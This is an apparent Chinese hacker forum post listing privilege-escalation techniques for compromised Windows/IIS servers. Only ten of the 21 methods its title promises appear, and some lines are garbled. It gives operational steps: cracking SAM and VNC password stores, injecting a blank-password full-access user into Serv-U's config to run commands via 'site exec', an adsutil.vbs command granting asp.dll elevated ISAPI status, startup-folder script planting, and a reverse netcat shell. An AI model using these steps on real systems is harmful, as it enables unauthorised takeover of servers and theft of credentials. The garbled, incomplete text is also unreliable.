21種提升權限的方法
以下全部是本人提權時候的總結,很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助!
1.radmin連接法
條件是你權限夠大,對方連防火牆也沒有。封裝個radmin上去,運行,開對方端口,然後radmin上去。本人從來沒成功過,端口到是給對方打開了。
2.paanywhere J�?)Y[KBa�
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這裡下他的GIF文件,在本地安裝pcanywhere上去。
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之。
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\引用:Serv-U,然後本地查看屬性,知道路徑後,看能否跳轉。進去後,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空。
[USER=WekweN|1]
PassWord=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues= yZfxv%N38/
這個用戶具有最高權限,然後我們就可以FTP上去 quote site exec xxx 來提升權限。
5.c:\winnt\system32\inetsrv\data\ tG(gOU1 e/
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行。
6.SU溢出提權
這個網上教程N多,不詳細講解了。
7.運行Csript
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiaPPS"來提升權限。
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps ,查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll,再將asp.dll加入特權一族。asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣),我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiAPPS "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\ASP.dll" 。可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiAPPS 來查看是不是加進去了。
8.腳本提權
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs。
9.
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\PassWord,我們可以用vncx4破解它。vncx4使用很簡單,只要在命令行下輸入:
c:\>vncx4 -W
然後順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。
10.NC提權
給對方來個NC,但是條件是你要有足夠的運行權限,然後把它反彈到自己的電腦上。
